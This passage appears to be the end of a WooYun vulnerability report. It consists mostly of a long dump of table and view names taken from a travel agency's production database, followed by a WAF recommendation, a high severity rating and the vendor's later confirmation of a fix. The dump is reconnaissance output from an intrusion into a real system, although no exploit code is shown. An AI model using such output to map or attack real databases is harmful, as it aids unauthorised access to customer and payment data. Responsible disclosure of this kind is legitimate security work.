| TRIMGFILE |
| TRIMPORTNOPROC |
| TRIMPORTSTCS |
| TRINAC |
| TRINS |
| TRINSPR |
| TRINVFORMAT |
| TRINVREMIT |
| TRIPERR |
| TRITKT |
| TRITKTAORD |
| TRITKTAORDD |
| TRITN |
| TRITNGT |
| TRITNSP |
| TRJPSUBJDR |
| TRKCASH |
| TRKCHKR |
| TRKCREC |
| TRKETRY |
| TRKEYIDXTMP |
| TRKORD |
| TRKORDD |
| TRKORDP |
| TRLABT |
| TRLAGENT |
| TRLCLS |
| TRLCLSL |
| TRLEAV |
| TRLEAVC |
| TRLGHST |
| TRLOCL |
| TRLOG |
| TRLOGC |
| TRLOGS |
| TRLOHST |
| TRLSAL |
| TRLVLK |
| TRLVLKD |
| TRMAILBUFDETAIL |
| TRMAILBUFFER |
| TRMAILBUFFERH |
| TRMAILMAP |
| TRMCHNLDTL |
| TRMCITYDTL_TW |
| TRMDBANK |
| TRMELTP |
| TRMELTPT |
| TRMELTR |
| TRMELTRT |
| TRMEMBER |
| TRMENU |
| TRMENUASP |
| TRMENUSITE |
| TRMGBOOK |
| TRMGCHGITN |
| TRMGCOST |
| TRMGCOSTD |
| TRMGCOSTHTL |
| TRMGDBUS |
| TRMGDBUSSEAT |
| TRMGDROOM |
| TRMGDROUT |
| TRMGFCAR |
| TRMGFCARITN |
| TRMGHTL |
| TRMGITN |
| TRMGITND |
| TRMGLOCL |
| TRMGOPITEM |
| TRMGREPAST |
| TRMGRUP |
| TRMGRUPINOUT |
| TRMGRUPREG |
| TRMGSCEN |
| TRMGTRAFFIC |
| TRMGVISA |
| TRMGVOUR |
| TRMOMOLOG |
| TRMOMOLOGDTL |
| TRMPGGRP |
| TRMPGGRPM |
| TRMPGHTL |
| TRMPGITN |
| TRMPLINKLOG |
| TRMSG |
| TRMSGRCV |
| TRMSGSEND |
| TRMSLN |
| TRMSLN_RSVT |
| TRMTEMPORARILYPAID |
| TRMTLINE |
| TRMTLINECITY |
| TRMTRELATION |
| TRMTRELATIOND |
| TRMTSTATION |
| TRMTSUBD |
| TRMTSUBDAMS |
| TRMTSUBDC |
| TRMTSUBDFARE |
| TRMTSUBDS |
| TRNATN |
| TRNATNKH |
| TRNATNRK |
| TRNATNSAREA |
| TRNATN_DC |
| TRNEWS |
| TRNEWSPIC |
| TRNEWSTP |
| TRNHLINK |
| TRNO |
| TRNULL |
| TRONSALE |
| TROPTBLG |
| TRORDCNTSET |
| TRORDLOG |
| TRORDMO |
| TRORDQA |
| TROVISA |
| TROVISAD |
| TRPACK |
| TRPAID |
| TRPAIDINV |
| TRPAIDP |
| TRPARA |
| TRPAX |
| TRPAXAGE |
| TRPAXAGEGP |
| TRPAXBK |
| TRPAXCLEAR |
| TRPAXFAVRK |
| TRPAXIVRECORD |
| TRPAXLOG |
| TRPAXP |
| TRPAXTVLFUND |
| TRPAXV |
| TRPCASH |
| TRPCHGITN |
| TRPCPN |
| TRPDPLLOG |
| TRPETRY |
| TRPGITN |
| TRPGRUPSUBD |
| TRPGSUBD |
| TRPHTL |
| TRPIC |
| TRPITN |
| TRPLMTFLT |
| TRPLMTTM |
| TRPMQ |
| TRPOLI |
| TRPORD |
| TRPORDD |
| TRPORDLITE |
| TRPORDLOG |
| TRPORT |
| TRPORTDEPLOC |
| TRPORTDEP_TW |
| TRPOSTLOG |
| TRPRG |
| TRPRGT |
| TRPRINT |
| TRPRLOG |
| TRPRN |
| TRPRNMSG |
| TRPRNMSGSET |
| TRPRODTAG |
| TRPROJ |
| TRPROMOTE |
| TRPROVINCE |
| TRPRT |
| TRPRTQUERYtmp |
| TRPRVL |
| TRPRVLT |
| TRPSEG |
| TRPSIGN |
| TRPSITN |
| TRPSUBAD |
| TRPSUBD |
| TRPSUBHAD |
| TRPSUBPAD |
| TRPSUBRAD |
| TRPTKTSUBD |
| TRPUBCONFIG |
| TRPUNCH |
| TRPUPDLOG |
| TRPWDPOLICY |
| TRQA |
| TRQTW |
| TRQTWD |
| TRQTW_ACCT |
| TRQTW_ITN |
| TRQTW_ITND |
| TRQTW_MARKUP |
| TRQTW_QTN |
| TRQTW_QTND |
| TRQTW_TRANS |
| TRQTW_TRUN |
| TRRATEBASE |
| TRRCASH |
| TRRCBOOK |
| TRRCBOOKD |
| TRRCBOOKDLOG |
| TRRCBOOKLOG |
| TRRCBOOKPAX |
| TRRCBOOKPAXLOG |
| TRRCCNTRACT2 |
| TRRCCONTRACT |
| TRRCDYGUIDE |
| TRRCDYGUIDED |
| TRRCHTL |
| TRRCHTLLOG |
| TRRCHTLROOM |
| TRRCHTLROOMLOG |
| TRRCHTLROOMUN |
| TRRCITN |
| TRRCITND |
| TRRCITNDLOG |
| TRRCITNDSLOG |
| TRRCITNDUN |
| TRRCMHTL |
| TRRCMHTLROOM |
| TRRCOTHER |
| TRRCOTHERD |
| TRRCOTHERDLOG |
| TRRCOTHERLOG |
| TRRCQUOTE |
| TRRCREST |
| TRRCRESTD |
| TRRCRESTDLOG |
| TRRCRESTLOG |
| TRRCT |
| TRRCTLOG |
| TRRCTP |
| TRRCTRFD |
| TRRCTRFDCOST |
| TRRCTRFDCOSTLOG |
| TRRCTRFDITN |
| TRRCTRFDITNLOG |
| TRRCTRFDLOG |
| TRRCTRFDTRIPCOST |
| TRRCTRFDTRIPCOSTLOG |
| TRRCTRFGUIDE |
| TRRCTRFGUIDELOG |
| TRRCTRIPCNFM |
| TRRCVD |
| TRRCVDCP |
| TRRCVDLITE |
| TRRCVDP |
| TRREBATECURR |
| TRREC |
| TRRECL |
| TRRECLOG |
| TRRECLT |
| TRRECP |
| TRRECPLOG |
| TRRECPTN |
| TRRECP_RSVT |
| TRRECSEATTMP |
| TRRECT |
| TRREC_RSVT |
| TRREGM |
| TRREGS |
| TRREGTAB |
| TRREGTM |
| TRRELA |
| TRREM |
| TRREPAST |
| TRREPASTIMG |
| TRREST |
| TRRETRY |
| TRRGST |
| TRRORD |
| TRRORDD |
| TRRQANS |
| TRRSVD |
| TRRSVDD |
| TRRWORD |
| TRSACCT |
| TRSAL |
| TRSALD |
| TRSALETOPIC |
| TRSALETOPICMGRUPSORT |
| TRSALETOPICSORT |
| TRSALETOPICSTYLE |
| TRSALT |
| TRSCEN |
| TRSCENALBUM |
| TRSCENIMG |
| TRSCENINFO |
| TRSCENTRFIC |
| TRSCOST |
| TRSEGCOSTGT45 |
| TRSEGCOSTLT45 |
| TRSFOM |
| TRSFOMD |
| TRSHOPPING |
| TRSHOPPINGDETAIL |
| TRSHOPPINGEXTRAGUID |
| TRSHOPPINGITEM |
| TRSITM |
| TRSMENU |
| TRSMSEVENT |
| TRSMSEVENTPAX |
| TRSMSLIST |
| TRSMSLISTBK |
| TRSMSPATTERN |
| TRSMSPRCLEXT |
| TRSMSPRCLOGD |
| TRSMSPROCLOG |
| TRSPACT |
| TRSPACTEVENTLOG |
| TRSPACTLOG |
| TRSPBEDREF |
| TRSPCODE |
| TRSPCODELOG |
| TRSPCONDODR |
| TRSPCONDODRLOG |
| TRSPCONDPAX |
| TRSPCONDPAXLOG |
| TRSPPAXREF |
| TRSPPAXREFLOG |
| TRSPPERIOD |
| TRSPPERIODLOG |
| TRSPPRD |
| TRSPRULE |
| TRSPRULELOG |
| TRSPTAR |
| TRSPTARLOG |
| TRSQLLOG |
| TRSTAT |
| TRSTATE |
| TRSTDTBSYNCLOG |
| TRSTORE |
| TRSTRAN |
| TRSUB |
| TRSUBC |
| TRSUBC_20140924 |
| TRSUBD |
| TRSUBD_20140924 |
| TRSUBJ |
| TRSUBSN |
| TRSWORD |
| TRSYNCPAXLOG |
| TRSYS |
| TRSYSCRS |
| TRSYSD |
| TRSYSD3 |
| TRSYSLOG |
| TRSYSOPTSETLOG |
| TRTAIRLN |
| TRTAIRLNC |
| TRTAIRLNCONTC |
| TRTAIRLNOFFLN |
| TRTANSY |
| TRTAREA |
| TRTBUPDATE |
| TRTCARRCMD |
| TRTCOMM |
| TRTCOST |
| TRTCPN |
| TRTCPNDTL |
| TRTCRSRULE |
| TRTDEPTCMD |
| TRTEMPORARILYPAID |
| TRTENBOX |
| TRTEST |
| TRTGIFT |
| TRTGRUPCALCAORDD |
| TRTGRUPCALCDTL |
| TRTGWFARE |
| TRTHST |
| TRTKT |
| TRTKTCMD |
| TRTKTCOSTMARKUP |
| TRTKTEMP |
| TRTKTMACH |
| TRTKTOPEN |
| TRTKTQAM |
| TRTKTRSVT |
| TRTKTRSVTD |
| TRTKTZONE |
| TRTLDR |
| TRTLPAY |
| TRTLRST |
| TRTMPACCT |
| TRTORD |
| TRTORDD |
| TRTORDDtmp |
| TRTORDS |
| TRTOURPLAN |
| TRTOURRATE |
| TRTOURRATED |
| TRTPPAYMENTLOG |
| TRTRAFIC |
| TRTRAN |
| TRTRANS |
| TRTRANSD1 |
| TRTRANSD2 |
| TRTRANS_RSVT |
| TRTRAN_O |
| TRTRCV |
| TRTREC |
| TRTRIPGRY |
| TRTRIPINFO |
| TRTRK |
| TRTSAL |
| TRTSALD |
| TRTSHOPPING |
| TRTSHOPPINGDETAIL |
| TRTSPECODE |
| TRTSRPAM |
| TRTSUBD |
| TRTSUBDAMD |
| TRTSUBDAMS |
| TRTSUBDC |
| TRTSUBDFARE |
| TRTSUBDS |
| TRTSUBDSYS |
| TRTSUBDTFR |
| TRTVLFUND |
| TRTVLFUNDD |
| TRTZNADDON |
| TRTZNADDONC |
| TRTZNCTY |
| TRTZNVIACARR |
| TRTZNVIACTY |
| TRTZONE |
| TRUGRUP |
| TRUSEDAIRP |
| TRUSEDCARR |
| TRUSEDCT |
| TRUSEDCTSQ |
| TRUSEDIMG |
| TRUSER |
| TRUSERDFT |
| TRUSR |
| TRUSRASP |
| TRUSRCOMP |
| TRUSRGRP |
| TRUSRLOG |
| TRUSRLOGH200806 |
| TRUSRLOGH200807 |
| TRUSRLOGH200808 |
| TRUSRLOGH200809 |
| TRUSRLOGH200810 |
| TRUSRLOGH200811 |
| TRUSRLOGH200812 |
| TRUSRLOGH200901 |
| TRUSRLOGH200902 |
| TRUSRLOGH200903 |
| TRUSRLOGH200904 |
| TRUSRLOGH200905 |
| TRUSRLOGH200906 |
| TRUSRLOGH200907 |
| TRUSRLOGH200908 |
| TRUSRLOGH200909 |
| TRUSRLOGH200910 |
| TRUSRLOGH200911 |
| TRUSRLOGH200912 |
| TRUSRLOGH201001 |
| TRUSRLOGH201002 |
| TRUSRLOGH201003 |
| TRUSRLOGH201004 |
| TRUSRLOGH201005 |
| TRUSRLOGH201006 |
| TRUSRLOGH201007 |
| TRUSRLOGH201008 |
| TRUSRLOGH201009 |
| TRUSRLOGH201010 |
| TRUSRLOGH201011 |
| TRUSRLOGH201012 |
| TRUSRLOGH201101 |
| TRUSRLOGH201102 |
| TRUSRLOGH201103 |
| TRUSRLOGH201104 |
| TRUSRLOGH201105 |
| TRUSRLOGH201106 |
| TRUSRLOGH201107 |
| TRUSRLOGH201108 |
| TRUSRLOGH201109 |
| TRUSRLOGH201110 |
| TRUSRLOGH201111 |
| TRUSRLOGH201112 |
| TRUSRLOGH201201 |
| TRUSRLOGH201202 |
| TRUSRLOGH201203 |
| TRUSRLOGH201204 |
| TRUSRLOGH201205 |
| TRUSRLOGH201206 |
| TRUSRLOGH201207 |
| TRUSRLOGH201208 |
| TRUSRLOGH201209 |
| TRUSRLOGH201210 |
| TRUSRLOGH201211 |
| TRUSRLOGH201212 |
| TRUSRLOGH201301 |
| TRUSRLOGH201302 |
| TRUSRLOGH201303 |
| TRUSRLOGH201304 |
| TRUSRLOGH201305 |
| TRUSRLOGH201306 |
| TRUSRLOGH201307 |
| TRUSRLOGH201308 |
| TRUSRLOGH201309 |
| TRUSRLOGH201310 |
| TRUSRLOGH201311 |
| TRUSRLOGH201312 |
| TRUSRLOGH201401 |
| TRUSRLOGH201402 |
| TRUSRLOGH201403 |
| TRUSRLOGH201404 |
| TRUSRLOGH201405 |
| TRUSRLOGH201406 |
| TRUSRLOGH201407 |
| TRUSRLOGH201408 |
| TRUSRLOGH201409 |
| TRUSRLOGH201410 |
| TRUSRLOGH201411 |
| TRUSRLOGH201412 |
| TRUSRLOGH201501 |
| TRUSRLOGH201502 |
| TRUSRLOGH201503 |
| TRUSRLOGH201504 |
| TRUSRLOGH201505 |
| TRUSRLOGH201506 |
| TRUSRLOGH201507 |
| TRUSRLOGH201508 |
| TRUSRLOGH201509 |
| TRUSRMENU |
| TRUSRMSG |
| TRUSRPERM |
| TRUSRPROCLOG |
| TRVDOCU |
| TRVEHICLE |
| TRVEHICLEMTN |
| TRVENDORCOST |
| TRVENDORCOSTD |
| TRVISA |
| TRVISARCVD |
| TRVISARCVDOCU |
| TRVISARCVM |
| TRVISASEND |
| TRVOUCH |
| TRVSTL |
| TRWEBLOGIN |
| TRWEBPGVIEW |
| TRWHITELIST |
| TRWINGON |
| TRWORD |
| TRXML |
| TRXO |
| TRXOD |
| TRXOITN |
| TR_PAGESORT |
| VW_Airpkg_AllCity |
| VW_Airpkg_Area |
| VW_Airpkg_City |
| VW_Airpkg_HTLSource |
| VW_Cms_AreaSort |
| VW_OT_Air_AirLine |
| VW_OT_Air_ArrvArea |
| VW_OT_Air_ArrvCity |
| VW_OT_Air_CabnExtra |
| VW_OT_Air_DeptCity |
| VW_OT_Air_Index |
| VW_OT_Air_RoomPrice |
| VW_OT_Air_TktPrice |
| VW_OT_Air_Tktextra |
| VW_OT_Air_TourInfo |
| V_DB_LastestBackup |
| V_DB_Size |
| V_DUPGRUPSUBD |
| V_DUPGRUPSUBD3 |
| V_GPAXQT |
| V_HW_Info |
| V_SQL_Ver |
| V_TNREG_GO_AGT |
| V_TNREG_GO_ASP |
| View_BKK |
| View_BKK_NEAR |
| View_BKK_NEW |
| View_BKK_NUM |
| View_CNA |
| View_CNA_NEAR |
| View_CNA_NEW |
| View_CNA_NUM |
| View_DXB |
| View_DXB_NEAR |
| View_DXB_NEW |
| View_DXB_NUM |
| View_EUR |
| View_EUR_NEAR |
| View_EUR_NEW |
| View_EUR_NUM |
| View_GUM |
| View_GUM_NEAR |
| View_GUM_NEW |
| View_GUM_NUM |
| View_HEC |
| View_HEC_NEAR |
| View_HEC_NEW |
| View_HEC_NUM |
| View_HKG |
| View_HKG_NEAR |
| View_HKG_NEW |
| View_HKG_NUM |
| View_IC |
| View_ICN |
| View_ICN_NEAR |
| View_ICN_NEW |
| View_ICN_NUM |
| View_IC_NEAR |
| View_IC_NEW |
| View_IC_NUM |
| View_IND |
| View_IND_NEAR |
| View_IND_NEW |
| View_IND_NUM |
| View_JPN |
| View_JPN_NEAR |
| View_JPN_NEW |
| View_JPN_NUM |
| View_Line_CH |
| View_Line_CN |
| View_Line_Cruises |
| View_Line_EUR |
| View_Line_HKG |
| View_Line_ID |
| View_Line_JP |
| View_Line_KR |
| View_Line_MY |
| View_Line_OLD |
| View_Line_PH |
| View_Line_PID |
| View_Line_SIN |
| View_Line_TH |
| View_Line_TK |
| View_Line_US |
| View_MAL |
| View_MAL_NEAR |
| View_MAL_NEW |
| View_MAL_NUM |
| View_OIL |
| View_OIL_NEAR |
| View_OIL_NEW |
| View_OIL_NUM |
| View_PH |
| View_PH_NEAR |
| View_PH_NEW |
| View_PH_NUM |
| View_SIN |
| View_SIN_NEAR |
| View_SIN_NEW |
| View_SIN_NUM |
| WAGAREA |
| WAPRODCNT |
| XMLContact |
| XMLFares |
| XMLOrder |
| XMLPaxs |
| XMLReceiveValida |
| XMLSegments |
| XMLTaxs |
| ZTB_BWT_DMGen |
| ZTB_BWT_DMGenSub |
| ZTB_CMS_NextTravel |
| ZTB_CMS_PhoneSurvey |
| ZTB_CMS_RepArguments |
| ZTB_CMS_TvlService |
| ZTB_Free_AirPkg_AirPlane |
| ZTB_Free_AirPkg_CabnInfo |
| ZTB_Free_AirPkg_FlyRBD |
| ZTB_Free_AirPkg_FlySegment |
| ZTB_Free_AirPkg_HTL |
| ZTB_Free_AirPkg_HTLPrice |
| ZTB_Free_AirPkg_HTLRmtp |
| ZTB_Free_AirPkg_Manage |
| ZTB_Free_AirPkg_Optional |
| ZTB_Free_AirPkg_TktPrice |
| ZTB_Free_AirPkg_Tktextra |
| ZTB_Free_AirPkg_Trip |
| ZTB_Free_AirPkg_TripRBD |
| ZTB_Free_AirPkg_TripSegment |
| ZTB_Free_Airpkg_FlyDiffInOut |
| ZTB_SYS_ArgumentClass |
| ZTB_SYS_Arguments |
| ZTB_SYS_Attachments |
| ZTB_SYS_Authorize |
| ZTB_SYS_DMAdv |
| ZTB_SYS_DataDictionary |
| ZTB_SYS_Department |
| ZTB_SYS_Jobtitle |
| ZTB_SYS_MaxNumber |
| ZTB_SYS_MembersBase |
| ZZ |
| ad_link_set |
| adlink |
| adtrack |
| alertemptyoftvlarea |
| b2e_emp |
| b2e_fit_list |
| b2e_news |
| b2e_part_products |
| b2e_push_trip |
| bbc_order |
| bbc_ordpaxs |
| bbc_tvl_agent |
| bbc_user |
| bestway |
| chaltrackop_sq |
| dtproperties |
| group_remark_log |
| gruptrack |
| lst_china |
| op_sq_remark_log |
| pcnta |
| pgURLSetAREA |
| sale_report_by_emp_cd |
| sale_report_by_emp_cd_8888 |
| sale_report_by_emp_cd_8888_tkt |
| sale_report_by_emp_cd_tkt |
| sale_report_by_source |
| sale_report_by_source_tkt |
| sale_report_dept |
| sale_report_output |
| sale_report_output_8888 |
| sale_report_output_8888_tkt |
| sale_report_output_tkt |
| sale_report_source_rate |
| sale_report_source_rate_tkt |
| sale_report_t_rate |
| sale_report_t_rate_tkt |
| select_tvl_area |
| sysdiagrams |
| travel_topic |
| travel_topic_B1_DTL |
| travel_topic_B1_PIC |
| travel_topic_B9_PIC |
| travel_topic_C3_DTL |
| travel_topic_C3_PIC |
| travel_topic_D1_DTL |
| trlogprofile |
| trmenubk |
| trmgitn1 |
| tvlarea_japan |
| tvlgrup_prom_activity |
| tvlknow |
| tvlknow_agt |
| tvlknow_am |
| tvlknow_civ |
| tvlknow_cru |
| tvlknow_eur |
| tvlknow_guam |
| tvlknow_hkg |
| tvlknow_in |
| tvlknow_ind |
| tvlknow_ind_agt |
| tvlknow_japan |
| tvlknow_japan_agt |
| tvlknow_kao |
| tvlknow_korea |
| tvlknow_korea_agt |
| tvlknow_mala |
| tvlknow_mala_agt |
| tvlknow_phil |
| tvlknow_sin |
| tvlknow_tai |
| tvlknow_thail |
| tvlknow_thail_agt |
| tvlmgrup |
| tvlmgrup_agt |
| tvlmgrup_agt_keyword |
| tvlmgrup_agt_keyword_grup |
| tvlmgrup_am |
| tvlmgrup_am_agt |
| tvlmgrup_am_agt_keyword |
| tvlmgrup_am_agt_keyword_grup |
| tvlmgrup_am_keyword |
| tvlmgrup_am_keyword_grup |
| tvlmgrup_am_prom |
| tvlmgrup_am_prom_grup |
| tvlmgrup_am_subject |
| tvlmgrup_am_subject_grup |
| tvlmgrup_civ |
| tvlmgrup_civ_agt |
| tvlmgrup_civ_agt_keyword |
| tvlmgrup_civ_agt_keyword_grup |
| tvlmgrup_civ_keyword |
| tvlmgrup_civ_keyword_grup |
| tvlmgrup_civ_prom |
| tvlmgrup_civ_prom_grup |
| tvlmgrup_civ_subject |
| tvlmgrup_civ_subject_grup |
| tvlmgrup_cru |
| tvlmgrup_cru_agt |
| tvlmgrup_cru_agt_keyword |
| tvlmgrup_cru_agt_keyword_grup |
| tvlmgrup_cru_

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-11-17 12:27

厂商回复:

感謝通報

最新状态:

2016-01-07:科威回應已修復程式,並已與百威聯繫進行程式更新。